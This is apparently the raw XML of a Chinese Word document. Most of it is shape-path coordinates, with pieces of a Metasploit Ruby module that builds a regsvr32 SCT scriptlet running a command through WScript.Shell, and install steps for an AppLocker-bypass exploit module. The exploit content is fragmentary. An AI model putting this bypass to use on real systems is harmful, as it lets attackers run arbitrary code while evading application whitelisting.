920,9736,2920,9735,2920,9734,2920,9733,2920,9731,2920,9730,2920,9729,2920,9727,2920,9726,2920,9725,2920,9723,2920,9722,2920,9720,2920,9719,2920,9717,2920,9715,2920,9714,2920,9712,2920,9710,2920,9708,2920,9707,2920,9705,2920,9703,2920,9701,2920,9699,2920,9697,2920,9695,2920,9693,2920,9691,2920,9688,2920,9686,2920,9684,2920,9681,2920,9679,2920,9677,2920,9674,2920,9672,2920,9669,2920,9666,2920,9664,2920,9661,2920,9658,2920,9656,2920,9653,2920,9650,2920,9647,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2920,9644,2919,9644,2919,9644,2919,9644,2919,9644,2919,9644,2918,9644,2918,9644,2918,9644,2917,9644,2917,9644,2917,9644,2916,9644,2916,9644,2916,9644,2915,9644,2915,9644,2914,9644,2913,9644,2913,9644,2912,9644,2911,9644,2911,9644,2910,9644,2909,9644,2908,9644,2908,9644,2907,9644,2906,9644,2905,9644,2904,9644,2903,9644,2902,9644,2900,9644,2899,9644,2898,9644,2897,9644,2895,9644,2894,9644,2892,9644,2891,9644,2889,9644,2888,9644,2886,9644,2884,9644,2883,9644,2881,9644,2879,9644,2877,9644,2875,9644,2873,9644,2871,9644,2869,9644,2866,9644,2864,9644,2862,9644,2859,9644,2857,9644,2854,9644,2851,9644,2849,9644,2846,9644,2843,9644,2840,9644,2837,9644,2834,9644,2831,9644,2827,9644,2824,9644,2821,9644,2817,9644,2814,9644,2810,9644,2806,9644,2803,9644,2799,9644,2795,9644,2791,9644,2787,9644,2782,9644,2778,9644,2774,9644,2769,9644,2764,9644,2760,9644,2755,9644,2750,9644,2745,9644,2740,9644,2735,9644,2730,9644,2724,9644,2719,9644,2713,9644,2708,9644,2702,9644,2696,9644,2690,9644,2684,9644,2678,9644,2672,9644,2665e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:121.500pt;margin-top:145.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2430,2910" coordsize="130,270">
        <v:shape style="position:absolute;left:2430;top:2910;width:130;height:270" coordorigin="2430,2910" coordsize="130,270" path="m2440,2935l2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2440,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2441,2935,2442,2935,2442,2935,2442,2935,2442,2935,2442,2935,2443,2935,2443,2935,2443,2935,2443,2935,2444,2935,2444,2935,2444,2935,2444,2935,2445,2935,2445,2935,2446,2935,2446,2935,2446,2935,2447,2935,2447,2935,2448,2935,2448,2935,2449,2935,2449,2935,2450,2935,2450,2935,2451,2935,2451,2935,2452,2935,2453,2935,2453,2935,2454,2935,2455,2935,2456,2935,2456,2935,2457,2935,2458,2935,2459,2935,2460,2935,2461,2935,2462,2935,2463,2935,2464,2935,2465,2935,2466,2935,2467,2935,2468,2935,2469,2935,2470,2935,2472,2935,2473,2935,2474,2935,2475,2935,2477,2935,2478,2935,2480,2935,2481,2935,2482,2935,2484,2935,2486,2935,2487,2935,2489,2935,2490,2935,2492,2935,2494,2935,2496,2935,2498,2935,2499,2935,2501,2935,2503,2935,2505,2935,2507,2935,2509,2935,2511,2935,2514,2935,2516,2935,2518,2935,2520,2935,2523,2935,2525,2935,2528,2935,2530,2935,2532,2935,2535,2935,2538,2935,2540,2935,2543,2935,2546,2935,2549,2935,2551,2935,2554,2935,2557,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2936,2560,2937,2560,2937,2560,2937,2560,2937,2560,2937,2560,2938,2560,2938,2560,2938,2560,2938,2560,2939,2560,2939,2560,2940,2560,2940,2560,2940,2560,2941,2560,2941,2560,2942,2560,2943,2560,2943,2560,2944,2560,2944,2560,2945,2560,2946,2560,2947,2560,2948,2560,2948,2560,2949,2560,2950,2560,2951,2560,2952,2560,2953,2560,2954,2560,2956,2560,2957,2560,2958,2560,2959,2560,2961,2560,2962,2560,2964,2560,2965,2560,2967,2560,2968,2560,2970,2560,2972,2560,2973,2560,2975,2560,2977,2560,2979,2560,2981,2560,2983,2560,2985,2560,2987,2560,2990,2560,2992,2560,2994,2560,2997,2560,2999,2560,3002,2560,3005,2560,3007,2560,3010,2560,3013,2560,3016,2560,3019,2560,3022,2560,3025,2560,3028,2560,3032,2560,3035,2560,3039,2560,3042,2560,3046,2560,3050,2560,3053,2560,3057,2560,3061,2560,3065,2560,3069,2560,3074,2560,3078,2560,3082,2560,3087,2560,3091,2560,3096,2560,3101,2560,3106,2560,3111,2560,3116,2560,3121,2560,3126,2560,3132,2560,3137,2560,3143,2560,3148,2560,3154,2560,3160,2560,3166,2560,3172,2560,3178,2560,3184,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2559,3191,2559,3191,2559,3191,2559,3191,2559,3191,2559,3191,2559,3191,2558,3191,2558,3191,2558,3191,2558,3191,2557,3191,2557,3191,2557,3191,2557,3191,2556,3191,2556,3191,2556,3191,2555,3191,2555,3191,2555,3191,2554,3191,2554,3191,2553,3191,2553,3191,2552,3191,2552,3191,2551,3191,2551,3191,2550,3191,2550,3191,2549,3191,2548,3191,2548,3191,2547,3191,2546,3191,2546,3191,2545,3191,2544,3191,2543,3191,2542,3191,2542,3191,2541,3191,2540,3191,2539,3191,2538,3191,2537,3191,2536,3191,2535,3191,2534,3191,2533,3191,2531,3191,2530,3191,2529,3191,2528,3191,2526,3191,2525,3191,2524,3191,2522,3191,2521,3191,2520,3191,2518,3191,2517,3191,2515,3191,2513,3191,2512,3191,2510,3191,2508,3191,2507,3191,2505,3191,2503,3191,2501,3191,2499,3191,2497,3191,2495,3191,2493,3191,2491,3191,2489,3191,2487,3191,2485,3191,2482,3191,2480,3191,2478,3191,2475,3191,2473,3191,2471,3191,2468,3191,2465,3191,2463,3191,2460,3191,2457,3191,2455,3191,2452,3191,2449,3191,2446,3191,2443,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3191,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3190,2440,3189,2440,3189,2440,3189,2440,3189,2440,3189,2440,3188,2440,3188,2440,3188,2440,3187,2440,3187,2440,3187,2440,3186,2440,3186,2440,3185,2440,3185,2440,3184,2440,3184,2440,3183,2440,3182,2440,3182,2440,3181,2440,3180,2440,3179,2440,3179,2440,3178,2440,3177,2440,3176,2440,3175,2440,3174,2440,3173,2440,3172,2440,3171,2440,3169,2440,3168,2440,3167,2440,3165,2440,3164,2440,3163,2440,3161,2440,3160,2440,3158,2440,3156,2440,3155,2440,3153,2440,3151,2440,3149,2440,3147,2440,3145,2440,3143,2440,3141,2440,3139,2440,3136,2440,3134,2440,3132,2440,3129,2440,3127,2440,3124,2440,3121,2440,3119,2440,3116,2440,3113,2440,3110,2440,3107,2440,3104,2440,3101,2440,3098,2440,3094,2440,3091,2440,3087,2440,3084,2440,3080,2440,3077,2440,3073,2440,3069,2440,3065,2440,3061,2440,3057,2440,3052,2440,3048,2440,3044,2440,3039,2440,3035,2440,3030,2440,3025,2440,3020,2440,3015,2440,3010,2440,3005,2440,3000,2440,2995,2440,2989,2440,2984,2440,2978,2440,2972,2440,2966,2440,2960,2440,2954,2440,2948,2440,2942,2440,2935e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:145.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,2910" coordsize="130,270">
        <v:shape style="position:absolute;left:2550;top:2910;width:130;height:270" coordorigin="2550,2910" coordsize="130,270" path="m2560,2935l2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2560,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2561,2935,2562,2935,2562,2935,2562,2935,2562,2935,2562,2935,2562,2935,2563,2935,2563,2935,2563,2935,2563,2935,2564,2935,2564,2935,2564,2935,2565,2935,2565,2935,2565,2935,2566,2935,2566,2935,2566,2935,2567,2935,2567,2935,2568,2935,2568,2935,2569,2935,2569,2935,2570,2935,2570,2935,2571,2935,2572,2935,2572,2935,2573,2935,2573,2935,2574,2935,2575,2935,2576,2935,2576,2935,2577,2935,2578,2935,2579,2935,2580,2935,2581,2935,2582,2935,2583,2935,2584,2935,2585,2935,2586,2935,2587,2935,2588,2935,2589,2935,2590,2935,2592,2935,2593,2935,2594,2935,2595,2935,2597,2935,2598,2935,2600,2935,2601,2935,2603,2935,2604,2935,2606,2935,2607,2935,2609,2935,2611,2935,2612,2935,2614,2935,2616,2935,2618,2935,2619,2935,2621,2935,2623,2935,2625,2935,2627,2935,2629,2935,2632,2935,2634,2935,2636,2935,2638,2935,2640,2935,2643,2935,2645,2935,2648,2935,2650,2935,2653,2935,2655,2935,2658,2935,2660,2935,2663,2935,2666,2935,2669,2935,2671,2935,2674,2935,2677,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2936,2680,2937,2680,2937,2680,2937,2680,2937,2680,2937,2680,2938,2680,2938,2680,2938,2680,2938,2680,2939,2680,2939,2680,2940,2680,2940,2680,2940,2680,2941,2680,2941,2680,2942,2680,2943,2680,2943,2680,2944,2680,2944,2680,2945,2680,2946,2680,2947,2680,2948,2680,2948,2680,2949,2680,2950,2680,2951,2680,2952,2680,2953,2680,2954,2680,2956,2680,2957,2680,2958,2680,2959,2680,2961,2680,2962,2680,2964,2680,2965,2680,2967,2680,2968,2680,2970,2680,2972,2680,2973,2680,2975,2680,2977,2680,2979,2680,2981,2680,2983,2680,2985,2680,2987,2680,2990,2680,2992,2680,2994,2680,2997,2680,2999,2680,3002,2680,3005,2680,3007,2680,3010,2680,3013,2680,3016,2680,3019,2680,3022,2680,3025,2680,3028,2680,3032,2680,3035,2680,3039,2680,3042,2680,3046,2680,3050,2680,3053,2680,3057,2680,3061,2680,3065,2680,3069,2680,3074,2680,3078,2680,3082,2680,3087,2680,3091,2680,3096,2680,3101,2680,3106,2680,3111,2680,3116,2680,3121,2680,3126,2680,3132,2680,3137,2680,3143,2680,3148,2680,3154,2680,3160,2680,3166,2680,3172,2680,3178,2680,3184,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2679,3191,2679,3191,2679,3191,2679,3191,2679,3191,2679,3191,2679,3191,2678,3191,2678,3191,2678,3191,2678,3191,2678,3191,2677,3191,2677,3191,2677,3191,2676,3191,2676,3191,2676,3191,2675,3191,2675,3191,2675,3191,2674,3191,2674,3191,2673,3191,2673,3191,2672,3191,2672,3191,2671,3191,2671,3191,2670,3191,2670,3191,2669,3191,2668,3191,2668,3191,2667,3191,2666,3191,2666,3191,2665,3191,2664,3191,2663,3191,2663,3191,2662,3191,2661,3191,2660,3191,2659,3191,2658,3191,2657,3191,2656,3191,2655,3191,2654,3191,2653,3191,2651,3191,2650,3191,2649,3191,2648,3191,2647,3191,2645,3191,2644,3191,2642,3191,2641,3191,2640,3191,2638,3191,2637,3191,2635,3191,2633,3191,2632,3191,2630,3191,2628,3191,2627,3191,2625,3191,2623,3191,2621,3191,2619,3191,2617,3191,2615,3191,2613,3191,2611,3191,2609,3191,2607,3191,2605,3191,2602,3191,2600,3191,2598,3191,2595,3191,2593,3191,2591,3191,2588,3191,2586,3191,2583,3191,2580,3191,2578,3191,2575,3191,2572,3191,2569,3191,2566,3191,2563,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3190,2560,3189,2560,3189,2560,3189,2560,3189,2560,3189,2560,3188,2560,3188,2560,3188,2560,3187,2560,3187,2560,3187,2560,3186,2560,3186,2560,3185,2560,3185,2560,3184,2560,3184,2560,3183,2560,3182,2560,3182,2560,3181,2560,3180,2560,3179,2560,3179,2560,3178,2560,3177,2560,3176,2560,3175,2560,3174,2560,3173,2560,3172,2560,3171,2560,3169,2560,3168,2560,3167,2560,3165,2560,3164,2560,3163,2560,3161,2560,3160,2560,3158,2560,3156,2560,3155,2560,3153,2560,3151,2560,3149,2560,3147,2560,3145,2560,3143,2560,3141,2560,3139,2560,3136,2560,3134,2560,3132,2560,3129,2560,3127,2560,3124,2560,3121,2560,3119,2560,3116,2560,3113,2560,3110,2560,3107,2560,3104,2560,3101,2560,3098,2560,3094,2560,3091,2560,3087,2560,3084,2560,3080,2560,3077,2560,3073,2560,3069,2560,3065,2560,3061,2560,3057,2560,3052,2560,3048,2560,3044,2560,3039,2560,3035,2560,3030,2560,3025,2560,3020,2560,3015,2560,3010,2560,3005,2560,3000,2560,2995,2560,2989,2560,2984,2560,2978,2560,2972,2560,2966,2560,2960,2560,2954,2560,2948,2560,2942,2560,2935e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:145.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,2910" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:2910;width:130;height:270" coordorigin="2670,2910" coordsize="130,270" path="m2680,2935l2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2680,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2681,2935,2682,2935,2682,2935,2682,2935,2682,2935,2682,2935,2682,2935,2683,2935,2683,2935,2683,2935,2683,2935,2684,2935,2684,2935,2684,2935,2685,2935,2685,2935,2685,2935,2686,2935,2686,2935,2686,2935,2687,2935,2687,2935,2688,2935,2688,2935,2689,2935,2689,2935,2690,2935,2690,2935,2691,2935,2692,2935,2692,2935,2693,2935,2694,2935,2694,2935,2695,2935,2696,2935,2697,2935,2697,2935,2698,2935,2699,2935,2700,2935,2701,2935,2702,2935,2703,2935,2704,2935,2705,2935,2706,2935,2707,2935,2708,2935,2709,2935,2710,2935,2712,2935,2713,2935,2714,2935,2715,2935,2717,2935,2718,2935,2720,2935,2721,2935,2723,2935,2724,2935,2726,2935,2727,2935,2729,2935,2731,2935,2732,2935,2734,2935,2736,2935,2738,2935,2740,2935,2741,2935,2743,2935,2745,2935,2747,2935,2749,2935,2752,2935,2754,2935,2756,2935,2758,2935,2760,2935,2763,2935,2765,2935,2768,2935,2770,2935,2773,2935,2775,2935,2778,2935,2780,2935,2783,2935,2786,2935,2789,2935,2792,2935,2794,2935,2797,2935,2800,2935,2800,2935,2800,2935,2800,2935,2800,2935,2800,2935,2800,2935,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2936,2800,2937,2800,2937,2800,2937,2800,2937,2800,2937,2800,2938,2800,2938,2800,2938,2800,2938,2800,2939,2800,2939,2800,2940,2800,2940,2800,2940,2800,2941,2800,2941,2800,2942,2800,2943,2800,2943,2800,2944,2800,2944,2800,2945,2800,2946,2800,2947,2800,2948,2800,2948,2800,2949,2800,2950,2800,2951,2800,2952,2800,2953,2800,2954,2800,2956,2800,2957,2800,2958,2800,2959,2800,2961,2800,2962,2800,2964,2800,2965,2800,2967,2800,2968,2800,2970,2800,2972,2800,2973,2800,2975,2800,2977,2800,2979,2800,2981,2800,2983,2800,2985,2800,2987,2800,2990,2800,2992,2800,2994,2800,2997,2800,2999,2800,3002,2800,3005,2800,3007,2800,3010,2800,3013,2800,3016,2800,3019,2800,3022,2800,3025,2800,3028,2800,3032,2800,3035,2800,3039,2800,3042,2800,3046,2800,3050,2800,3053,2800,3057,2800,3061,2800,3065,2800,3069,2800,3074,2800,3078,2800,3082,2800,3087,2800,3091,2800,3096,2800,3101,2800,3106,2800,3111,2800,3116,2800,3121,2800,3126,2800,3132,2800,3137,2800,3143,2800,3148,2800,3154,2800,3160,2800,3166,2800,3172,2800,3178,2800,3184,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2800,3191,2799,3191,2799,3191,2799,3191,2799,3191,2799,3191,2799,3191,2798,3191,2798,3191,2798,3191,2798,3191,2798,3191,2797,3191,2797,3191,2797,3191,2797,3191,2796,3191,2796,3191,2795,3191,2795,3191,2795,3191,2794,3191,2794,3191,2793,3191,2793,3191,2793,3191,2792,3191,2792,3191,2791,3191,2790,3191,2790,3191,2789,3191,2789,3191,2788,3191,2787,3191,2787,3191,2786,3191,2785,3191,2784,3191,2783,3191,2783,3191,2782,3191,2781,3191,2780,3191,2779,3191,2778,3191,2777,3191,2776,3191,2775,3191,2774,3191,2773,3191,2772,3191,2770,3191,2769,3191,2768,3191,2767,3191,2765,3191,2764,3191,2763,3191,2761,3191,2760,3191,2758,3191,2757,3191,2755,3191,2753,3191,2752,3191,2750,3191,2748,3191,2747,3191,2745,3191,2743,3191,2741,3191,2739,3191,2737,3191,2735,3191,2733,3191,2731,3191,2729,3191,2727,3191,2725,3191,2723,3191,2720,3191,2718,3191,2716,3191,2713,3191,2711,3191,2708,3191,2706,3191,2703,3191,2700,3191,2698,3191,2695,3191,2692,3191,2689,3191,2686,3191,2683,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3190,2680,3189,2680,3189,2680,3189,2680,3189,2680,3189,2680,3188,2680,3188,2680,3188,2680,3187,2680,3187,2680,3187,2680,3186,2680,3186,2680,3185,2680,3185,2680,3184,2680,3184,2680,3183,2680,3182,2680,3182,2680,3181,2680,3180,2680,3179,2680,3179,2680,3178,2680,3177,2680,3176,2680,3175,2680,3174,2680,3173,2680,3172,2680,3171,2680,3169,2680,3168,2680,3167,2680,3165,2680,3164,2680,3163,2680,3161,2680,3160,2680,3158,2680,3156,2680,3155,2680,3153,2680,3151,2680,3149,2680,3147,2680,3145,2680,3143,2680,3141,2680,3139,2680,3136,2680,3134,2680,3132,2680,3129,2680,3127,2680,3124,2680,3121,2680,3119,2680,3116,2680,3113,2680,3110,2680,3107,2680,3104,2680,3101,2680,3098,2680,3094,2680,3091,2680,3087,2680,3084,2680,3080,2680,3077,2680,3073,2680,3069,2680,3065,2680,3061,2680,3057,2680,3052,2680,3048,2680,3044,2680,3039,2680,3035,2680,3030,2680,3025,2680,3020,2680,3015,2680,3010,2680,3005,2680,3000,2680,2995,2680,2989,2680,2984,2680,2978,2680,2972,2680,2966,2680,2960,2680,2954,2680,2948,2680,2942,2680,2935e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:193.500pt;margin-top:145.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3870,2910" coordsize="130,270">
        <v:shape style="position:absolute;left:3870;top:2910;width:130;height:270" coordorigin="3870,2910" coordsize="130,270" path="m3881,2935l3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3881,2935,3882,2935,3882,2935,3882,2935,3882,2935,3882,2935,3882,2935,3882,2935,3882,2935,3883,2935,3883,2935,3883,2935,3883,2935,3883,2935,3884,2935,3884,2935,3884,2935,3884,2935,3885,2935,3885,2935,3885,2935,3886,2935,3886,2935,3886,2935,3887,2935,3887,2935,3887,2935,3888,2935,3888,2935,3889,2935,3889,2935,3890,2935,3890,2935,3891,2935,3892,2935,3892,2935,3893,2935,3893,2935,3894,2935,3895,2935,3896,2935,3896,2935,3897,2935,3898,2935,3899,2935,3900,2935,3901,2935,3901,2935,3902,2935,3903,2935,3904,2935,3905,2935,3906,2935,3908,2935,3909,2935,3910,2935,3911,2935,3912,2935,3913,2935,3915,2935,3916,2935,3917,2935,3919,2935,3920,2935,3922,2935,3923,2935,3925,2935,3926,2935,3928,2935,3930,2935,3931,2935,3933,2935,3935,2935,3936,2935,3938,2935,3940,2935,3942,2935,3944,2935,3946,2935,3948,2935,3950,2935,3952,2935,3954,2935,3957,2935,3959,2935,3961,2935,3963,2935,3966,2935,3968,2935,3971,2935,3973,2935,3976,2935,3978,2935,3981,2935,3984,2935,3987,2935,3989,2935,3992,2935,3995,2935,3998,2935,4001,2935,4001,2935,4001,2935,4001,2935,4001,2935,4001,2935,4001,2935,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2936,4001,2937,4001,2937,4001,2937,4001,2937,4001,2937,4001,2938,4001,2938,4001,2938,4001,2938,4001,2939,4001,2939,4001,2940,4001,2940,4001,2940,4001,2941,4001,2941,4001,2942,4001,2943,4001,2943,4001,2944,4001,2944,4001,2945,4001,2946,4001,2947,4001,2948,4001,2948,4001,2949,4001,2950,4001,2951,4001,2952,4001,2953,4001,2954,4001,2956,4001,2957,4001,2958,4001,2959,4001,2961,4001,2962,4001,2964,4001,2965,4001,2967,4001,2968,4001,2970,4001,2972,4001,2973,4001,2975,4001,2977,4001,2979,4001,2981,4001,2983,4001,2985,4001,2987,4001,2990,4001,2992,4001,2994,4001,2997,4001,2999,4001,3002,4001,3005,4001,3007,4001,3010,4001,3013,4001,3016,4001,3019,4001,3022,4001,3025,4001,3028,4001,3032,4001,3035,4001,3039,4001,3042,4001,3046,4001,3050,4001,3053,4001,3057,4001,3061,4001,3065,4001,3069,4001,3074,4001,3078,4001,3082,4001,3087,4001,3091,4001,3096,4001,3101,4001,3106,4001,3111,4001,3116,4001,3121,4001,3126,4001,3132,4001,3137,4001,3143,4001,3148,4001,3154,4001,3160,4001,3166,4001,3172,4001,3178,4001,3184,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4001,3191,4000,3191,4000,3191,4000,3191,4000,3191,4000,3191,4000,3191,4000,3191,4000,3191,3999,3191,3999,3191,3999,3191,3999,3191,3999,3191,3998,3191,3998,3191,3998,3191,3998,3191,3997,3191,3997,3191,3997,3191,3996,3191,3996,3191,3996,3191,3995,3191,3995,3191,3995,3191,3994,3191,3994,3191,3993,3191,3993,3191,3992,3191,3992,3191,3991,3191,3990,3191,3990,3191,3989,3191,3989,3191,3988,3191,3987,3191,3986,3191,3986,3191,3985,3191,3984,3191,3983,3191,3982,3191,3981,3191,3981,3191,3980,3191,3979,3191,3978,3191,3977,3191,3976,3191,3974,3191,3973,3191,3972,3191,3971,3191,3970,3191,3968,3191,3967,3191,3966,3191,3965,3191,3963,3191,3962,3191,3960,3191,3959,3191,3957,3191,3956,3191,3954,3191,3952,3191,3951,3191,3949,3191,3947,3191,3946,3191,3944,3191,3942,3191,3940,3191,3938,3191,3936,3191,3934,3191,3932,3191,3930,3191,3928,3191,3925,3191,3923,3191,3921,3191,3919,3191,3916,3191,3914,3191,3911,3191,3909,3191,3906,3191,3904,3191,3901,3191,3898,3191,3895,3191,3893,3191,3890,3191,3887,3191,3884,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3191,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3190,3881,3189,3881,3189,3881,3189,3881,3189,3881,3189,3881,3188,3881,3188,3881,3188,3881,3187,3881,3187,3881,3187,3881,3186,3881,3186,3881,3185,3881,3185,3881,3184,3881,3184,3881,3183,3881,3182,3881,3182,3881,3181,3881,3180,3881,3179,3881,3179,3881,3178,3881,3177,3881,3176,3881,3175,3881,3174,3881,3173,3881,3172,3881,3171,3881,3169,3881,3168,3881,3167,3881,3165,3881,3164,3881,3163,3881,3161,3881,3160,3881,3158,3881,3156,3881,3155,3881,3153,3881,3151,3881,3149,3881,3147,3881,3145,3881,3143,3881,3141,3881,3139,3881,3136,3881,3134,3881,3132,3881,3129,3881,3127,3881,3124,3881,3121,3881,3119,3881,3116,3881,3113,3881,3110,3881,3107,3881,3104,3881,3101,3881,3098,3881,3094,3881,3091,3881,3087,3881,3084,3881,3080,3881,3077,3881,3073,3881,3069,3881,3065,3881,3061,3881,3057,3881,3052,3881,3048,3881,3044,3881,3039,3881,3035,3881,3030,3881,3025,3881,3020,3881,3015,3881,3010,3881,3005,3881,3000,3881,2995,3881,2989,3881,2984,3881,2978,3881,2972,3881,2966,3881,2960,3881,2954,3881,2948,3881,2942,3881,2935e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:321.600pt;width:404.400pt;height:38.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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926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90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91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92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gen_sct_file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command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93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%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?XML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version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"1.0"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?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scriptlet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registration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progid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"#{rand_text_a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lphanumeric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8}"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classid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"{#{rand_class_id}}"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&gt;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script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CDATA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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-4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"WScript.Shell"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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"#{command}"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script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regist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ration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scriptlet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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="926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94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95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"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="92"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>end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使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用方法：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copy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regsvr32_applocker_bypass_server.rb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/usr/share/metasploit-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framework/modules/exploits/windows/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misc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7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